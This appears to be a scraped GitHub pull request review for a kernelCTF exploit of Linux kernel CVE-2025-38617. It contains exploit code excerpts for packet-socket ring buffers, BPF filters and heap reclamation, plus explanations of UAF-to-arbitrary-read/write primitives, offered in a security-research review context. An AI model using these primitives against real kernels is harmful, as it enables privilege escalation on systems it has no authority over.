Add kernelCTF CVE-2025-38617_mitigation_cos by quanggle97 · Pull Request #339 · google/security-research

quanggle97 · 2026-02-25T23:47:25Z

No description provided.

quanggle97 · 2026-02-26T08:07:11Z

@koczkatamas Pull request is ready for reviewing

koczkatamas

Hey!

Your exploit code and writeup is very long and although explains a lot of details, it's very hard to follow or get a quick understanding what's happening exactly.

So I have a few questions:

Q1. Which kernel structures (struct XXX within the kernel source) are freed and then used due the UAF? Which fields of those objects are used (those which are relevant for the exploitation)?

Q2. What object did you spray pages_order2_read_primitive to allocate in the space of the UAF'd object from Q1?

Q3. My understanding is that you can overwrite a simple_xattr's structure size field via the original vulnerability in pages_order2_read_primitive.

Let's say simple_xattr looks like this:

struct simple_xattr {
        struct rb_node             rb_node;              /*     0    24 */
        char *                     name;                 /*    24     8 */
        size_t                     size;                 /*    32     8 */
        char                       value[];              /*    40     0 */
};

What is the effect of the vulnerability you are using? Out-of-bounds write of 8 bytes? How / where in the source code exactly do you set the right offset (the offset of the size field)? What cache (in case of SLAB) or order of pages (in case of BUDDY) are you writing from to which cache/pages?

Where do you set the length of the write? (Is it filter[MAX_FILTER_LEN - 1].k = sizeof(size_t);?)

If you'd like to only overwrite 8 bytes, why don't you send a 8-byte long packet? To get into the right cache?

Are the other fields (like rb_node, name, or value) overwritten or your primitive allows you precise only 8-byte overwrite of the size field?

What other constraints do you have for this primitive? Can you choose any offset and size, or there are any restrictions?

Q4. From which object's which field do you leak leaked_content_simple_xattr_kernel_address?

Do I understand correctly that you reuse the original OOB overwrite primitive to overwrite a pgv[] order-2 page to be able to mmap the address of the leaked_content_simple_xattr and modify its values to get the simple_xattr_read_write primitive?

Which fields do you use for the RW purpose? name or value+size? Where I see setting these fields in the source code?

Q5. Why do you need the abr_page_read_write_primitive when you could also RW with the simple_xattr_read_write_primitive?

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+	rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
+	rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
+	rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
+	rx_ring.tp_sizeof_priv = 16248;


Is this the place you are adjusting the right offset to be written? How do you calculate this offset exactly? Please use struct sizes and field offsets in the calculation to understand how this works.

Q1: The ring buffer is freed (represented by struct pgv which is basically an array of kernel pointers)
Q2: Another ring buffer is used for reclamation purpose.
Q3: The vuln allows me to perform oob write with control size and control offset. How the exploit control the offset I think i described in UAF section. The packet is allocated from function packet_sendmsg_spkt() which has a check inside dev_validate_header() that doesn't allow packet with 8 bytes len. I specifically chose to only the size field. I can build the generic page overflow primitive but I decided just to pick the number fit my strategy.
Q4: Yes
Q5: The simple_xattr_read_write_primitive only allows us to perform read/write on that struct simple_xattr object not abr read/write. I just want to keep the simple_xattr_read_write_primitive alive. If we free that struct simple_xattr object, what if we fail to reclaim its with something we want ?

Hey!

A few followup questions / requests:

Q1) Why is packet_reserve = 38 in mitigation and packet_reserve = 30 in the COS version, what's the difference between the two versions (field offsets, source code differences)?

Q2) IIUC first you overwrite simple_xattr.size at offset 32 (in pages_order2_read_primitive_init), and then pgv[0].buffer at offset 0 (in simple_xattr_read_write_primitive_init), but both functions use tp_sizeof_priv = 16248 and packet_reserve = 38 (in mitigation). What am I missing, where is the 32 bytes difference that you overwrite different offsets with the seemingly same parameters?

Q3) So IIUC you can read/write arbitrary address with simple_xattr_read_write_primitive too but simple_xattr requires spraying the object again and this process can fail (unreliable), so you created abr_page_read_write_primitive which is a stable ARB read/write primitive. Is my understanding correct or are there other differences?

Q1: Because difference struct simple_xattr layout between COS and Mitigation (one use linked list and one use red black tree).
Q2: I overwrite pgv + X where X represent the same offset as size offset in struct simple_xattr. Although overwrite pgv[0] is possible to but since the difference doesn't matter, I decide to keep the offset the same.
Q3: Yes. We need to win race 2 times to reach this point so I don't want to lose that strong primitive so I try to think about further exploit flow that cannot fail.

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+	struct tpacket_req3 tx_ring = {};
+	tx_ring.tp_block_size = PAGES_ORDER1_SIZE;
+	tx_ring.tp_block_nr = 1;
+	tx_ring.tp_frame_size = PAGES_ORDER1_SIZE;
+	tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr;
+
+	struct tpacket_req3 rx_ring = {};
+	rx_ring.tp_block_size = PAGES_ORDER3_SIZE;
+	rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
+	rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
+	rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
+	rx_ring.tp_sizeof_priv = 16248;
+	rx_ring.tp_retire_blk_tov = USHRT_MAX;
+
+	struct sock_filter filter[MAX_FILTER_LEN] = {};
+	for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
+		filter[i].code = BPF_LD | BPF_IMM;
+		filter[i].k = 0xcafebabe;
+	}
+
+	filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K;
+	filter[MAX_FILTER_LEN - 1].k = sizeof(void *);
+
+	primitive->victim_packet_socket_config = victim_packet_socket_config_create(
+		(struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo
+		(struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr
+		tx_ring,	// tx_ring
+		rx_ring,	// rx_ring
+		1,		// packet_loss
+		TPACKET_V3,	// packet_version
+		30,		// packet_reserve
+		filter		// filter
+	);


Significant code duplication for setting up packet socket configuration rings and BPF filters.

Recommendation: Extract the common packet socket configuration logic into a dedicated utility function.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

primitive->victim_packet_socket_config = util_create_shared_packet_socket_config();

Read more about this violation in the 'Code duplication' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Like i commented above, I don't build generic page overflow primitive. Part of the packet socket configuration is used to build that page overflow primitive. For example, if i want to perform PAGES_ORDER3_SIZE overflow, i will chose the buffer size of victim ring buffer to have size PAGES_ORDER4_SIZE and the buffer size of reclamation ring buffer to have size PAGES_ORDER3_SIZE. packet_reserve can be modified to affect the overwrite offset to. I think i described these on the UAF section.

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+
+		alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE);
+		void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0);
+		void *mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);


Variable name mem1 is too generic and similar to mem.

Recommendation: Use a descriptive name representing the specific mapping, such as fake_xattr_mem.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

void *fake_xattr_mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);

Read more about this violation in the 'Naming conventions' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

At that point, these addresses are freed and the expectation is struct pgv object is successfully reclaim on one of these addresses. I kept mem and mem1 to represent right now, the exploit still not know what actually in these addresses.

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+
+bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive)
+{
+	void *tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive);


Too generic variable name 'tmp' used for primitive output.

Recommendation: Rename the variable to reflect its contents, such as leaked_data.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

void *leaked_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive);

Read more about this violation in the 'Naming conventions' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+	if ((next & (PAGES_ORDER2_SIZE - 1)) == 0) {
+		pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = next;
+		pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
+	} else if ((prev & (PAGES_ORDER2_SIZE - 1)) == 0) {
+		pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = prev;
+		pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
+	}


Logic to set kernel address variables is duplicated verbatim across if/else blocks.

Recommendation: Refactor the logic to determine the valid address first, then assign the variables in a single shared block.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

u64 valid_addr = ((next & (PAGES_ORDER2_SIZE - 1)) == 0) ? next : prev; pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = valid_addr; pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = valid_addr + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;

Read more about this violation in the 'Code duplication' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

koczkatamas · 2026-02-27T17:00:52Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c

+	rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
+	rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
+	rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
+	rx_ring.tp_sizeof_priv = 16248;


Usage of an unexplained magic number.

Recommendation: Replace the magic number with a descriptive macro or add an explanatory comment.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

rx_ring.tp_sizeof_priv = TPACKET_SIZEOF_PRIV_VALUE; /* 16248 */

Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Again, i don't build generic page overflow function. If i have to use a descriptive macro, it will look like TPACKET_SIZEOF_PRIV_VALUE_TO_KEEP_THE_UNCONTROLLED_WRITE_DATA_NEAR_THE_END_OF_RECLAMATION_BUFFER_FROM_RING_BUFFER ...

koczkatamas · 2026-02-27T17:00:52Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c

+	struct sock_filter filter[MAX_FILTER_LEN] = {};
+	for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
+		filter[i].code = BPF_LD | BPF_IMM;
+		filter[i].k = 0xcafebabe;


Unexplained magic number used in BPF filter.

Recommendation: Define the magic number as a macro or document its irrelevance.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

filter[i].k = BPF_PLACEHOLDER_VALUE; /* 0xcafebabe */

Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

wizkernel · 2026-03-09T14:05:24Z

tried to execute it locally on both mitigation-v4-6.6 and cos-109-17800.519.4 and it stuck on pages_order2_read_primitive_build , any idea why ? is the race failing?

Is it related to, saw you modify this :
struct timespec pages_order2_read_primitive_timer_interrupt_amplitude = { .tv_nsec = 155000 };

wizkernel · 2026-03-09T20:41:19Z

It also seems that the exploit does not have a 100% success rate as stated in the "stability_notes". Most of the time it causes a kernel NULL pointer dereference bug, which contradicts what you said in your blog - that it can be deterministic.

quanggle97 · 2026-03-10T08:52:09Z

@wizkernel : Due to the pull request script check that auto kill if no flag output in 60 seconds, I have to play with the interrupt amplitude to make it good enough to win race in 60 seconds. Although there is a way to detect if tpacket_rcv() hitted and interrupt hitted, doing so make the exploit cannot finish in time. The NULL pointer dereference usually happened on the non-mitigation instance because I develop the exploit for the mitigation first and port to other instance later. The stability_notes is just for reference. I usually copy from old file and modify necessary field. But I'm pretty sure if you have the correct local interrupt amplitude or modify the code locally to run with the interrupt amplitude range loop, the mitigation exploit success rate is around 90%->100% (again, usually took more than 60s)

quanggle97 · 2026-03-10T09:49:16Z

@wizkernel The blog post describes the exploit flow optimized for mitigation instance. For non-mitigation instance, there should be other choice to reclaim the UAF object due to no heap hardening. Back then, I submitted the flag for LTS instance too but cannot win the slot (last slot before the userns is disabled). Therefore, I don't even try to write another version optimized for non-mitigation instance (COS just need 10% stability).

quanggle97 added 4 commits February 26, 2026 06:47

Add kernelCTF CVE-2025-38617_mitigation_cos

be0ecfa

Update exploit.c

2ca48fb

Update exploit.c

39a2c06

Update exploit.md

a1e716d

koczkatamas reviewed Feb 27, 2026

View reviewed changes

quanggle97 added 24 commits February 28, 2026 15:40

Update exploit.c

fb86478

Update exploit.c

2b06b5a

Update exploit.md

c9da30d

Update exploit.c

95ed168

Update exploit.c

6d34363

Update exploit.c

5c47321

Update exploit.c

3772ee5

Update exploit.c

3521137

Update exploit.c

c7b43ce

Update exploit.c

1677f9f

Update exploit.c

b63016d

Update exploit.c

60da077

Update exploit.c

7c988b3

Update exploit.h

f8ffedc

Update exploit.c

152dd3f

Update exploit.c

4444b69

Update exploit.c

aaa58a1

Update exploit.md

7d80c19

Update exploit.c

8f37de8

Update exploit.c

f39792b

Update exploit.c

1d44cba

Update exploit.c

6be41d3

Update exploit.c

cb34bd7

Update exploit.c

18326ee

quanggle97 added 6 commits March 1, 2026 18:11

Update exploit.c

e891259

Update exploit.c

d025b8a

Update exploit.c

9d593f5

Update exploit.c

2cde2f7

Update exploit.c

a58b2a5

Update exploit.c

b5696f2

artmetla added the kCTF: vuln OK The submission exploits the claims vulnerability (passed manual verification) label Mar 2, 2026

quanggle97 added 2 commits March 10, 2026 16:04

Update metadata.json

2766b62

Update metadata.json

0d2abc6

Conversation

quanggle97 commented Feb 25, 2026

Uh oh!

quanggle97 commented Feb 26, 2026

Uh oh!

koczkatamas left a comment

Choose a reason for hiding this comment

Uh oh!

koczkatamas Feb 27, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

quanggle97 Mar 10, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

wizkernel commented Mar 9, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

wizkernel commented Mar 9, 2026

Uh oh!

quanggle97 commented Mar 10, 2026

Uh oh!

quanggle97 commented Mar 10, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

koczkatamas Feb 27, 2026 •

edited

Loading

quanggle97 Mar 10, 2026 •

edited

Loading

wizkernel commented Mar 9, 2026 •

edited

Loading

quanggle97 commented Mar 10, 2026 •

edited

Loading